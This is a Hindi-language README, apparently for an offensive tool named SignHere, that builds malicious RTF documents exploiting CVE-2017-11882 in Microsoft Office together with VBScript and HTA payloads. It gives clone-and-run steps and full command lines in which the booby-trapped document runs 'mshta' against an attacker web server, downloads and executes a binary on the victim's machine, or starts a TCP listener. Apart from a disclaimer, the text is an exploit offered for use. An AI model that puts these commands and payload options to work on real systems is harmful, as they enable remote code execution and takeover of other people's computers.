
SignHere, CVE-2017-11882 का कार्यान्वयन है। SignHere दुर्भावनापूर्ण rtf दस्तावेज़ और VBScript payloads का निर्माता है।
CVE-2017-11882 - यह अद्वितीय भेद्यता पहचानकर्ता Microsoft Office 2007 सर्विस पैक 3, Microsoft Office 2010 सर्विस पैक 2, Microsoft Office 2013 सर्विस पैक 1, और Microsoft Office 2016 को प्रभावित करता है, जो एक हमलावर को मेमोरी में ऑब्जेक्ट्स को ठीक से संभाले बिना वर्तमान उपयोगकर्ता के संदर्भ में कोड चलाने की अनुमति देता है, जिसे "Microsoft Office मेमोरी करप्शन भेद्यता" कहा जाता है। कार्यान्वयन में VBScript में दुर्भावनापूर्ण rtf दस्तावेज़ और पेलोड बनाने के लिए एक प्रोग्राम शामिल है।
यह rtf दस्तावेज़ ही कमजोर हैं क्योंकि उन्हें विशेष कमांड- RTF हेडर्स जानकर "प्रोग्राम" किया जा सकता है। इस प्रकार, दस्तावेज़ के मुख्य भाग में एक बाइनरी (निष्पादनीय) ऑब्जेक्ट बनाया जाता है, वास्तव में, यह एक Microsoft Equation फॉर्मूला है जिसमें कोड होता है जिसमें cmd कमांड शामिल होता है। फिर आप VBScript में पेलोड जनरेट कर सकते हैं और hta फ़ाइल को निष्पादित करने के लिए कमांड " mshta link to the payload file" का उपयोग कर सकते हैं।
लेखक और योगदानकर्ता आपके द्वारा या आपको हुए किसी भी नुकसान के लिए जिम्मेदार नहीं हैं।
आप Termux का उपयोग कर सकते हैं, लेकिन प्रोग्राम को निष्पादित करने के लिए रूट की आवश्यकता है
git clone https://github.com/Retr0-code/SignHere/
cd SignHere/
chmod +x SignHere.py
./SignHere.py --help
पहले, आपको archive डाउनलोड करना होगा। फिर इसे अनज़िप करें और इस फ़ोल्डर में एक PowerShell विंडो खोलें और लिखें:
.\SignHere.py --help
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --powershell "start iexplore.exe https://github.com/Retr0-code/SignHere" --ip 192.168.1.74 --output generated.rtf
--cmd वह तर्क जिसमें विंडोज कमांड होगा जो दस्तावेज़ खोलने के बाद निष्पादित होगा।
--powershell वह तर्क जिसमें पॉवरशेल कमांड होगा जो VBScript पेलोड में होगा।
--ip वह तर्क जो वेब-सर्वर के लिए उपयोग किया जाएगा IP पता। (डिफ़ॉल्ट: 127.0.0.1)
--output दस्तावेज़ का नाम और पथ।
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --temp exploit.exe --ip 192.168.1.74 --output generated.rtf
--temp वह तर्क जो बाइनरी फ़ाइल को पेलोड के रूप में उपयोग करेगा (बाइनरी फ़ाइल RAM मेमोरी में शुरू होगी)।
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --payload exploit.exe --ip 192.168.1.74 --listener-host 192.168.1.74 --output generated.rtf
--payload वह तर्क जो पीड़ित के कंप्यूटर पर फ़ाइल डाउनलोड करके उसे निष्पादित करेगा।
--listener-host वर्तमान IP पर TCP लिसनर शुरू करने के लिए तर्क (डिफ़ॉल्ट: 127.0.0.1)